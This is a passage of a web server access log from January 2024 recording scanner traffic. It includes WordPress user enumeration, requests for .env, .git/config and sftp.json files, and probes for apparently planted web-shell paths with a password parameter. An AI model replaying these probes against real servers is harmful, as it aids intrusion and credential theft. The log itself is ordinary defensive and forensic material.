Chrome/60.0.3112.107 Moblie Safari/537.36" 208.109.175.252 - - [08/Jan/2024:23:44:15 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 208.109.175.252 - - [08/Jan/2024:23:44:21 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 208.109.175.252 - - [08/Jan/2024:23:44:25 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [09/Jan/2024:07:00:39 +0700] "GET /simple.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [09/Jan/2024:07:01:05 +0700] "GET /general.php?pd=1&mapname=op.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 183.136.225.45 - - [09/Jan/2024:11:56:30 +0700] "GET /login.php HTTP/1.1" 301 162 "http://103.153.2.236:8880" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.45 - - [09/Jan/2024:11:56:40 +0700] "GET /login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 91.92.252.169 - - [10/Jan/2024:19:59:21 +0700] "GET /simple.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [10/Jan/2024:19:59:52 +0700] "GET /general.php?pd=1&mapname=op.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 20.205.110.167 - - [11/Jan/2024:06:03:45 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 20.205.110.167 - - [11/Jan/2024:06:03:49 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 20.205.110.167 - - [11/Jan/2024:06:03:52 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [11/Jan/2024:14:44:01 +0700] "GET /style.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 97.74.207.34 - - [12/Jan/2024:03:11:22 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 97.74.207.34 - - [12/Jan/2024:03:11:28 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 97.74.207.34 - - [12/Jan/2024:03:11:32 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [12/Jan/2024:05:30:13 +0700] "GET /style.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [13/Jan/2024:03:55:00 +0700] "GET /admin.php?action=beindex&password=sem2023 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [13/Jan/2024:18:02:58 +0700] "GET /admin.php?action=beindex&password=sem2023 HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 18.201.88.65 - - [14/Jan/2024:01:23:59 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.0; +https://forms.gle/ajBaxygz9jSR8p8G9)" 18.201.88.65 - - [14/Jan/2024:01:24:03 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.0; +https://forms.gle/ajBaxygz9jSR8p8G9)" 91.92.252.169 - - [14/Jan/2024:19:37:43 +0700] "GET /admin.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Jan/2024:19:37:54 +0700] "GET /wp-admin/images/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Jan/2024:19:38:01 +0700] "GET /wp-admin/includes/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Jan/2024:19:38:10 +0700] "GET /.well-known/pki-validation/index.php?p= HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Jan/2024:19:38:20 +0700] "GET /wp-admin/css/colors/light/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Jan/2024:19:38:33 +0700] "GET /wp-admin/css/colors/light/admin.php?p= HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [14/Jan/2024:19:38:44 +0700] "GET /wp-admin/css/colors/light/content.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 14.225.205.4 - - [16/Jan/2024:06:17:19 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 14.225.205.4 - - [16/Jan/2024:06:17:24 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 14.225.205.4 - - [16/Jan/2024:06:17:27 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 91.92.252.169 - - [16/Jan/2024:13:48:07 +0700] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 162 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 64.90.48.187 - - [18/Jan/2024:01:57:56 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 64.90.48.187 - - [18/Jan/2024:01:58:02 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 64.90.48.187 - - [18/Jan/2024:01:58:05 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 144.91.106.14 - - [18/Jan/2024:15:01:55 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36" 167.71.171.21 - - [19/Jan/2024:15:37:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 91.92.252.169 - - [19/Jan/2024:17:28:39 +0700] "GET /wp-content/plugins/ai-engine/app/chatbot.js HTTP/1.1" 301 162 "-" "python-requests/2.27.1" 91.92.252.169 - - [19/Jan/2024:17:28:51 +0700] "GET /wp-content/plugins/post-smtp/readme.txt HTTP/1.1" 301 162 "-" "python-requests/2.27.1" 184.107.184.25 - - [20/Jan/2024:08:23:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 184.107.184.24 - - [20/Jan/2024:08:23:10 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 184.107.184.22 - - [20/Jan/2024:08:23:15 +0700] "GET /favicon.ico HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 184.107.184.31 - - [20/Jan/2024:08:23:23 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 184.107.184.25 - - [20/Jan/2024:08:23:29 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 91.92.252.169 - - [21/Jan/2024:05:51:38 +0700] "GET /wp-admin/images/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Jan/2024:05:51:46 +0700] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Jan/2024:05:51:53 +0700] "GET /wp-admin/css/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [21/Jan/2024:05:52:00 +0700] "GET /wp-admin/css/colors/light/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 35.211.10.21 - - [21/Jan/2024:10:35:27 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.10.21 - - [21/Jan/2024:10:35:44 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.10.21 - - [21/Jan/2024:10:36:15 +0700] "GET /app-ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.10.21 - - [21/Jan/2024:10:36:15 +0700] "GET /ads.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.10.21 - - [21/Jan/2024:10:36:18 +0700] "GET /checkout/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.10.21 - - [21/Jan/2024:10:36:18 +0700] "GET /shop/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 35.211.10.21 - - [21/Jan/2024:10:36:18 +0700] "GET /wp-content/plugins/woocommerce/readme.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; 2fc3a14cf8) Chrome/84.0.4147.105 Safari/537.36" 198.235.24.54 - - [21/Jan/2024:14:15:05 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 54.184.222.16 - - [22/Jan/2024:10:17:34 +0700] "GET /.well-known/acme-challenge/y6l3HMF9OL_n65oIgrdNtSS8yJHfgpwBpyyNnaHQYao HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 23.178.112.100 - - [22/Jan/2024:10:17:34 +0700] "GET /.well-known/acme-challenge/y6l3HMF9OL_n65oIgrdNtSS8yJHfgpwBpyyNnaHQYao HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 3.138.186.53 - - [22/Jan/2024:10:17:34 +0700] "GET /.well-known/acme-challenge/y6l3HMF9OL_n65oIgrdNtSS8yJHfgpwBpyyNnaHQYao HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" 64.227.126.135 - - [22/Jan/2024:10:18:49 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 64.227.126.135 - - [22/Jan/2024:10:18:49 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA084438) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.1738.98 Mobile Safari/537.3" 64.227.126.135 - - [22/Jan/2024:10:18:50 +0700] "GET /.vscode/sftp.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:50 +0700] "GET /about HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:50 +0700] "GET /debug/default/view?panel=config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:51 +0700] "GET /v2/_catalog HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:51 +0700] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:51 +0700] "GET /server-status HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:52 +0700] "GET /login.action HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:52 +0700] "GET /_all_dbs HTTP/1.1" 301 162 "-" "Mozilla/5.0 (l9scan/2.0.633323e223e2335313e2330313; +https://leakix.net)" 64.227.126.135 - - [22/Jan/2024:10:18:52 +0700] "GET /.DS_Store HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:53 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:53 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:53 +0700] "GET /s/633323e223e2335313e2330313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:54 +0700] "GET /config.json HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:54 +0700] "GET /telescope/requests HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 64.227.126.135 - - [22/Jan/2024:10:18:54 +0700] "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 301 162 "-" "Go-http-client/1.1" 34.116.183.33 - - [22/Jan/2024:10:19:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36" 205.169.39.174 - - [22/Jan/2024:10:19:22 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 205.169.39.174 - - [22/Jan/2024:10:19:37 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 65.154.226.168 - - [22/Jan/2024:10:19:43 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36" 86.167.162.106 - - [22/Jan/2024:10:20:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 Autopliuslt/7.8.0 EmbeddedBrowser (iPhone; CPU iPhone OS 17_2_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile DeviceUID: VendorUID: AppPkgID: lt.plius.auto" 84.17.42.49 - - [22/Jan/2024:10:20:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 Autopliuslt/7.8.0 EmbeddedBrowser (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile DeviceUID: VendorUID: AppPkgID: lt.plius.auto" 138.199.18.61 - - [22/Jan/2024:10:20:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq" 103.55.39.187 - - [22/Jan/2024:10:20:09 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 Autopliuslt/7.8.0 EmbeddedBrowser (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile DeviceUID: VendorUID: AppPkgID: lt.plius.auto" 65.154.226.167 - - [22/Jan/2024:10:20:21 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36" 84.17.42.49 - - [22/Jan/2024:10:20:25 +0700] "OPTIONS / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 uacq" 146.70.108.183 - - [22/Jan/2024:10:20:25 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393" 84.17.42.49 - - [22/Jan/2024:10:20:26 +0700] "GET /favicon.ico HTTP/1.1" 301 162 "-" "Mozilla/5.0 Autopliuslt/7.8.0 EmbeddedBrowser (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile DeviceUID: VendorUID: AppPkgID: lt.plius.auto" 91.92.252.169 - - [22/Jan/2024:19:30:46 +0700] "GET /wp-admin/images/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [22/Jan/2024:19:30:57 +0700] "GET /wp-admin/css/colors/midnight/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [22/Jan/2024:19:31:08 +0700] "GET /wp-admin/css/index.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 91.92.252.169 - - [22/Jan/2024:19:31:18 +0700] "GET /wp-admin/css/colors/light/content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 57.128.141.236 - - [23/Jan/2024:00:58:59 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 57.128.141.236 - - [23/Jan/2024:00:59:04 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 57.128.141.236 - - [23/Jan/2024:00:59:08 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 54.203.120.26 - - [23/Jan/2024:02:58:15 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8" 91.92.252.169 - - [23/Jan/2024:10:47:04 +0700] "GET /wp-admin/css/colors/blue/about.php?auth_key HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [23/Jan/2024:10:47:21 +0700] "GET /wp-admin/network/about.php?auth_key HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 164.92.155.215 - - [24/Jan/2024:01:53:01 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 91.92.252.169 - - [24/Jan/2024:06:03:11 +0700] "GET /wp-admin/css/colors/blue/about.php?auth_key HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 91.92.252.169 - - [24/Jan/2024:06:03:30 +0700] "GET /wp-admin/network/about.php?auth_key HTTP/1.1" 301 162 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.130.60 - - [24/Jan/2024:17:21:19 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 146.190.130.60 - - [24/Jan/2024:17:21:19 +0700] "POST / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 139.59.209.23 - - [24/Jan/2024:23:18:36 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 139.59.209.23 - - [24/Jan/2024:23:18:41 +0700] "GET ///?author=1 HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 139.59.209.23 - - [24/Jan/2024:23:18:44 +0700] "GET ///wp-json/wp/v2/users/ HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0" 54.247.220.223 - - [25/Jan/2024:00:25:33 +0700] "GET / HTTP/1.1" 301 162 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 Zalo iOS/448 ZaloTheme/light ZaloLanguage/en" 80.64.218.173 - - [26/Jan/2024:00:00:53 +0700] "GET /.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 198.235.24.37 - - [27/Jan/2024:01:11:47 +0700] "GET / HTTP/1.1" 301 162 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 205.210.31.30 - - [28/Jan/2024:09:40:47 +0700] "GET / HTTP/1.1" 301 162 "-" "-" 146.190.130.60 - - [28/Jan/2024:18:27:40 +0700] "GET /.env HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 54.242.49.231 - - [28/Jan/2024:19:52:57 +0700] "GET /system/.git/config HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36" 34.254.223.206 - - [28/Jan/2024:21:10:26 +0700] "GET /robots.txt HTTP/1.1" 301 162 "-" "Mozilla/5.0 (compatible; wpbot/1.0; +https://forms.gle/ajBaxygz9jSR8p8G9)" 62.221.192.174 - - [29/Jan/2024:02:42:19 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 